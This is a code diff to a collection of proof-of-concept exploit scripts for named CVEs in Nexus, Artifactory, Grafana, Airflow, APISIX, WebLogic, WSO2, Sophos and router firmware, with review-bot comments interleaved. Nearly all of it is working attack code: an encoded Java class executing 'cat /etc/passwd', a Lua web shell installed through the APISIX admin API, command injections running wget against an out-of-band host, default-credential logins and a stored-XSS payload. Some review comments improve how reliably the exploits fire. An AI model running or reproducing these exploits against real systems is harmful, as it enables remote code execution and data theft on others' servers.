diff --git a/2019/CVE-2019-7238/poc/pocsploit/CVE-2019-7238.py b/2019/CVE-2019-7238/poc/pocsploit/CVE-2019-7238.py
index 3eb6c7564..d19c96522 100644
--- a/2019/CVE-2019-7238/poc/pocsploit/CVE-2019-7238.py
+++ b/2019/CVE-2019-7238/poc/pocsploit/CVE-2019-7238.py
@@ -1,4 +1,5 @@
import requests
+import re
# Vuln Base Info
@@ -38,9 +39,9 @@ def poc(url):
path = """/service/extdirect"""
method = "POST"
- data = """{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='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'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}"""
+ data = {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a0
08b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c6
16e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b0
03d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}
headers = {'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (re.search(r"""root:.*:0:0:""",resp0.text)) and (resp0.status_code == 200):
result["success"] = True
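Review bot: The trailing `3054` passed to `defineClass.invoke(...)` must equal the byte length of the hex class blob assigned to `x` (`len(hex) // 2`), and nothing in the hunk ties the two together, so any edit to the blob makes the call fail on the target and the PoC just reports failure. Building the expression in Python with `class_hex = "cafebabe..."` and interpolating both `class_hex` and `len(class_hex) // 2` removes that coupling. The switch to `json=data` is the right fix here: the old literal embedded real newlines inside a JSON string, which is not valid JSON, whereas `json.dumps` now escapes them.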
diff --git a/2019/CVE-2019-9733/poc/pocsploit/CVE-2019-9733.py b/2019/CVE-2019-9733/poc/pocsploit/CVE-2019-9733.py
index b67c384b7..ab8558d41 100644
--- a/2019/CVE-2019-9733/poc/pocsploit/CVE-2019-9733.py
+++ b/2019/CVE-2019-9733/poc/pocsploit/CVE-2019-9733.py
@@ -1,3 +1,4 @@
+import json
import requests
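Review bot: `import json` is added but nothing in this change uses it; the body is handed to requests as `json=data`, which serialises the dict itself, so the import is dead. Either drop the line or, if the intent was to control the encoding, send `data=json.dumps(data)` instead.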
@@ -39,9 +40,9 @@ def poc(url):
path = """/artifactory/ui/auth/login?_spring_security_remember_me=false"""
method = "POST"
- data = """{"user":"access-admin","password":"password","type":"login"}"""
+ data = {"user":"access-admin","password":"password","type":"login"}
headers = {'Accept': 'application/json, text/plain, */*', 'X-Requested-With': 'artUI', 'X-Forwarded-For': '127.0.0.1', 'Request-Agent': 'artifactoryUI', 'Content-Type': 'application/json'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""username": "access-admin""" in resp0.text) and (resp0.status_code == 200):
result["success"] = True
diff --git a/2020/CVE-2020-11110/poc/pocsploit/CVE-2020-11110.py b/2020/CVE-2020-11110/poc/pocsploit/CVE-2020-11110.py
index 473c36718..7e2946ba9 100644
--- a/2020/CVE-2020-11110/poc/pocsploit/CVE-2020-11110.py
+++ b/2020/CVE-2020-11110/poc/pocsploit/CVE-2020-11110.py
@@ -38,9 +38,9 @@ def poc(url):
path = """/api/snapshots"""
method = "POST"
- data = """{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}"""
+ data = {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":True,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":True}]},"editable":True,"gnetId":None,"graphTooltip":0,"id":None,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":None,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":None,"version":0},"name":"Dashboard","expires":0}
headers = {'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'en-US,en;q=0.5', 'content-type': 'application/json', 'Connection': 'close'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp0.status_code == 200) and ("""application/json""" in str(resp0.headers)) and ("""deleteKey":""" in resp0.text and """deleteUrl":""" in resp0.text):
result["success"] = True
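Review bot: The POST creates a persistent snapshot whose `originalUrl` holds the `javascript:alert('Revers3c')` payload, and nothing in the hunk removes it, so every scan leaves a stored-XSS artifact on the target. The success condition already confirms the response carries `deleteKey` and `deleteUrl`; a follow-up request to that URL, e.g. `requests.get(resp0.json()["deleteUrl"], timeout=10, verify=False)` after recording success, would clean up. The exact delete semantics should be confirmed against the Grafana version under test, but the response itself supplies the endpoint, so the cleanup needs no extra knowledge.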
diff --git a/2020/CVE-2020-11978/poc/pocsploit/CVE-2020-11978.py b/2020/CVE-2020-11978/poc/pocsploit/CVE-2020-11978.py
index 8b67b4107..0ff7c1e13 100644
--- a/2020/CVE-2020-11978/poc/pocsploit/CVE-2020-11978.py
+++ b/2020/CVE-2020-11978/poc/pocsploit/CVE-2020-11978.py
@@ -40,21 +40,19 @@ def poc(url):
path = """/api/experimental/test"""
method = "GET"
- data = """"""
headers = {'Accept': '*/*'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/api/experimental/dags/example_trigger_target_dag/paused/false"""
method = "GET"
- data = """"""
headers = {'Accept': '*/*'}
- resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp1 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/api/experimental/dags/example_trigger_target_dag/dag_runs"""
method = "POST"
- data = """{"conf": {"message": "\"; touch test #"}}"""
+ data = {"conf": {"message": "\"; touch test #"}}
headers = {'Accept': '*/*', 'Content-Type': 'application/json'}
- resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp2 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
tmp = re.findall(r'"execution_date":"([0-9-A-Z:+]+)"', resp2.text)
if tmp:
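Review bot: The sequence unpauses `example_trigger_target_dag` and triggers a run whose `conf.message` breaks out of the bash command to run `touch test`, so a positive result has real side effects on the scheduler and worker (DAG left unpaused, a file created in the task's working directory). That deserves a comment on the `data = {"conf": ...}` line, e.g. `# NOTE: state-changing: unpauses the example DAG and runs 'touch test' on the worker; re-pause via .../paused/true after the check`. `re.findall` on the last line relies on `re` being imported earlier in the file; that import is not visible in this diff, so confirm it exists.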
@@ -65,11 +63,10 @@ def poc(url):
path = """/api/experimental/dags/example_trigger_target_dag/dag_runs/{exec_date}/tasks/bash_task""".format(exec_date=exec_date)
method = "GET"
- data = """"""
headers = {'Accept': '*/*'}
- resp3 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp3 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
- if '"operator":"BashOperator"' in resp3.text and "application/json" in str(resp.headers):
+ if '"operator":"BashOperator"' in resp3.text and "application/json" in str(resp3.headers):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
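Review bot: `exec_date` is captured by `[0-9-A-Z:+]+` and so can carry a `+HH:MM` offset, but it is interpolated into the path unencoded; depending on how the server decodes `+` in a path segment it may become a space and miss the run, so `urllib.parse.quote(exec_date, safe='')` is the safer form. The `resp` -> `resp3` correction is right; the old name would have raised `NameError` inside the `try` and been swallowed. The enclosing `if tmp:` body and `poc` itself start before this hunk.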
diff --git a/2020/CVE-2020-13117/poc/pocsploit/CVE-2020-13117.py b/2020/CVE-2020-13117/poc/pocsploit/CVE-2020-13117.py
index d57d98d0c..130f9bea0 100644
--- a/2020/CVE-2020-13117/poc/pocsploit/CVE-2020-13117.py
+++ b/2020/CVE-2020-13117/poc/pocsploit/CVE-2020-13117.py
@@ -41,7 +41,7 @@ def poc(url):
path = """/cgi-bin/login.cgi"""
method = "POST"
- data = """newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2Foob_domain%3B%60%3B%23&password=asd&lang_select=en"""
+ data = """newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{oob_domain}%3B%60%3B%23&password=asd&lang_select=en""".format(oob_domain=oob_domain)
headers = {'Origin': 'http://{{Hostname}}', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept-Encoding': 'gzip, deflate'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
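Review bot: `'Origin': 'http://{{Hostname}}'` is a leftover template placeholder and is sent to the device literally, while the body on the line above was correctly converted to `.format(oob_domain=...)`. Use the real target, `'Origin': url`, or drop the header if the CGI does not check it. The `ipaddr=192.168.1.66` and `hostname=wifi.wavlink.com` fields are likewise hard-coded captures; harmless for the injection in `key=`, but worth a one-line comment so nobody tries to "fix" them.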
diff --git a/2020/CVE-2020-13945/poc/pocsploit/CVE-2020-13945.py b/2020/CVE-2020-13945/poc/pocsploit/CVE-2020-13945.py
index 86d8dd62d..365b77209 100644
--- a/2020/CVE-2020-13945/poc/pocsploit/CVE-2020-13945.py
+++ b/2020/CVE-2020-13945/poc/pocsploit/CVE-2020-13945.py
@@ -1,4 +1,6 @@
import requests
+import random
+import string
# Vuln Base Info
@@ -33,29 +35,29 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ randstr = gen_random_str(10)
try:
url = format_url(url)
path = """/apisix/admin/routes"""
method = "POST"
- data = """{
- "uri":"/{{randstr}}",
- "script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
- "upstream":{
- "type":"roundrobin",
- "nodes":{
- "example.com:80":1
- }
- }
-}"""
+ data = {
+ "uri":"/{randstr}".format(randstr=randstr),
+ "script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
+ "upstream":{
+ "type":"roundrobin",
+ "nodes":{
+ "example.com:80":1
+ }
+ }
+ }
headers = {'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'Content-Type': 'application/json'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
- path = """/{{randstr}}?cmd=id"""
+ path = """/{randstr}?cmd=id""".format(randstr=randstr)
method = "GET"
- data = """"""
headers = {}
- resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp1 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""action":"create""" in resp1.text and """script":""" in resp1.text and """node":""" in resp1.text) and (resp1.status_code == 201):
result["success"] = True
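Review bot: The success condition inspects `resp1` for `"action":"create"`, `"script":` and `"node":` with status 201, but those are fields of the route-creation response (`resp0`); `resp1` is the GET on `/{randstr}?cmd=id`, whose body is the command output, so the check can never match and the PoC always reports failure. Split it: `resp0.status_code == 201 and '"action":"create"' in resp0.text` for creation and `'uid=' in resp1.text` for execution. The route also persists on the target after the check; the creation response carries the route id, which `DELETE /apisix/admin/routes/<id>` with the same `X-API-KEY` can remove.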
@@ -80,4 +82,7 @@ def format_url(url):
url = 'http://' + url
url = url.rstrip('/')
- return url
\ No newline at end of file
+ return url
+
+def gen_random_str(length):
+ return ''.join(random.choice(string.ascii_letters) for _ in range(length))
\ No newline at end of file
diff --git a/2020/CVE-2020-14882/poc/pocsploit/CVE-2020-14882.py b/2020/CVE-2020-14882/poc/pocsploit/CVE-2020-14882.py
index 75e10474d..40bb6ad65 100644
--- a/2020/CVE-2020-14882/poc/pocsploit/CVE-2020-14882.py
+++ b/2020/CVE-2020-14882/poc/pocsploit/CVE-2020-14882.py
@@ -45,7 +45,7 @@ def poc(url):
path = """/console/images/%252e%252e%252fconsole.portal"""
method = "POST"
- data = """_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://oob_domain")"""
+ data = """_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://{oob_domain}")""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2020/CVE-2020-18268/poc/pocsploit/CVE-2020-18268.py b/2020/CVE-2020-18268/poc/pocsploit/CVE-2020-18268.py
index 963e312cd..40d0cebe2 100644
--- a/2020/CVE-2020-18268/poc/pocsploit/CVE-2020-18268.py
+++ b/2020/CVE-2020-18268/poc/pocsploit/CVE-2020-18268.py
@@ -1,4 +1,5 @@
import requests
+import hashlib
# Vuln Base Info
@@ -33,6 +34,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
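Review bot: `username`/`password` were template variables (`{{username}}`, `{{password}}`) and are now frozen to `"admin"`/`"admin"` inside `poc`, so the check cannot be pointed at a target with different credentials without editing the file. Keyword defaults keep callers working and restore configurability: `def poc(url, username="admin", password="admin"):`. A short comment that these are the credentials the login step sends, not something the vulnerability bypasses, would help too.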
@@ -40,7 +43,7 @@ def poc(url):
path = """/zb_system/cmd.php?act=verify"""
method = "POST"
- data = """btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0"""
+ data = """btnPost=Log+In&username={username}&password={md5_password}&savedate=0""".format(username=username, md5_password=MD5(password))
headers = {'Content-Length': '81', 'Content-Type': 'application/x-www-form-urlencoded', 'Connection': 'close'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
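Review bot: `'Content-Length': '81'` is a stale hand-written header: with `username="admin"` and a 32-character MD5 the formatted body is 82 bytes, and in any case requests recomputes the header from the body it actually sends, so the literal is at best dead and at worst misleading to the next reader. Drop it from the headers dict and let requests set it. `s.request` refers to a session created outside this hunk.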
@@ -73,4 +76,9 @@ def format_url(url):
url = 'http://' + url
url = url.rstrip('/')
- return url
\ No newline at end of file
+ return url
+
+def MD5(str):
+ m = hashlib.md5()
+ m.update(str.encode('utf-8'))
+ return m.hexdigest()
\ No newline at end of file
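Review bot: `def MD5(str):` shadows the builtin `str` inside the helper and uses a PascalCase name for a plain function; `def md5_hex(text): return hashlib.md5(text.encode('utf-8')).hexdigest()` is the same thing in one line without the shadowing. The caller in `poc` would need the matching rename, so keep `MD5 = md5_hex` as an alias if anything else imports it. A docstring noting that the server expects the MD5 hex of the password (what the old `{{md5("{{password}}")}}` template helper produced) would explain why a non-cryptographic hash is used here.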
diff --git a/2020/CVE-2020-24589/poc/pocsploit/CVE-2020-24589.py b/2020/CVE-2020-24589/poc/pocsploit/CVE-2020-24589.py
index 753d0802c..7d4e12961 100644
--- a/2020/CVE-2020-24589/poc/pocsploit/CVE-2020-24589.py
+++ b/2020/CVE-2020-24589/poc/pocsploit/CVE-2020-24589.py
@@ -41,7 +41,7 @@ def poc(url):
path = """/carbon/generic/save_artifact_ajaxprocessor.jsp"""
method = "POST"
- data = """payload=<%3fxml+version%3d"1.0"+%3f>%25xxe%3b]>"""
+ data = """payload=<%3fxml+version%3d"1.0"+%3f>%25xxe%3b]>""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
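Review bot: The `payload=` literal handed to `.format(oob_domain=oob_domain)` contains no `{oob_domain}` placeholder, so the call is a no-op and nothing in the request points at the OOB host; `%25xxe%3b` references a `%xxe;` parameter entity whose `<!ENTITY % xxe SYSTEM "http://{oob_domain}">` declaration and enclosing `<!DOCTYPE` are missing from the string. Any `verify_request(type="dns", ...)` check after this can never succeed. Restore the DTD with the placeholder, URL-encoded since it is a form field, before the format call.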
diff --git a/2020/CVE-2020-25223/poc/pocsploit/CVE-2020-25223.py b/2020/CVE-2020-25223/poc/pocsploit/CVE-2020-25223.py
index c4d52e93a..7c6f177a1 100644
--- a/2020/CVE-2020-25223/poc/pocsploit/CVE-2020-25223.py
+++ b/2020/CVE-2020-25223/poc/pocsploit/CVE-2020-25223.py
@@ -41,7 +41,7 @@ def poc(url):
path = """/var"""
method = "POST"
- data = """{"objs": [{"FID": "init"}], "SID": "|wget http://oob_domain|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}"""
+ data = """{"objs": [{"FID": "init"}], "SID": "|wget http://{oob_domain}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}""".format(oob_domain=oob_domain)
headers = {'Accept': 'text/javascript, text/html, application/xml, text/xml, */*', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'X-Requested-With': 'XMLHttpRequest', 'X-Prototype-Version': '1.5.1.1', 'Content-Type': 'application/json; charset=UTF-8', 'Connection': 'close', 'Sec-Fetch-Dest': 'empty', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Site': 'same-origin'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
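Review bot: `.format(oob_domain=oob_domain)` on this literal raises instead of substituting: the JSON braces in `{"objs": [{"FID": "init"}], ...}` are parsed as replacement fields, `str.format` throws a `KeyError` on `"objs"` before the request is sent, and the surrounding `try` then swallows it. Either escape every literal brace as `{{`/`}}` or, consistent with the rest of this commit, build a dict and send it with `json=`: `data = {"objs": [{"FID": "init"}], "SID": "|wget http://%s|" % oob_domain, "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": None, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": True}` and `requests.request(..., json=data, ...)`.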
diff --git a/2020/CVE-2020-25506/poc/pocsploit/CVE-2020-25506.py b/2020/CVE-2020-25506/poc/pocsploit/CVE-2020-25506.py
index 9bfd65f17..3d04164ef 100644
--- a/2020/CVE-2020-25506/poc/pocsploit/CVE-2020-25506.py
+++ b/2020/CVE-2020-25506/poc/pocsploit/CVE-2020-25506.py
@@ -42,11 +42,11 @@ def poc(url):
path = """/cgi-bin/system_mgr.cgi?"""
method = "POST"
- data = """C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://oob_domain`"""
+ data = """C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{oob_domain}`""".format(oob_domain=oob_domain)
headers = {'Accept': '*/*'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
- path = """/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://oob_domain`"""
+ path = """/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{oob_domain}`""".format(oob_domain=oob_domain)
method = "POST"
data = """"""
headers = {'Accept': '*/*'}
diff --git a/2020/CVE-2020-26413/poc/pocsploit/CVE-2020-26413.py b/2020/CVE-2020-26413/poc/pocsploit/CVE-2020-26413.py
index ec73348dc..9a83ac6dd 100644
--- a/2020/CVE-2020-26413/poc/pocsploit/CVE-2020-26413.py
+++ b/2020/CVE-2020-26413/poc/pocsploit/CVE-2020-26413.py
@@ -39,13 +39,13 @@ def poc(url):
path = """/api/graphql"""
method = "POST"
- data = """{
- "query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }",
- "variables": null,
- "operationName": null
-}"""
+ data = {
+ "query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }",
+ "variables": None,
+ "operationName": None
+ }
headers = {'Content-Type': 'application/json'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
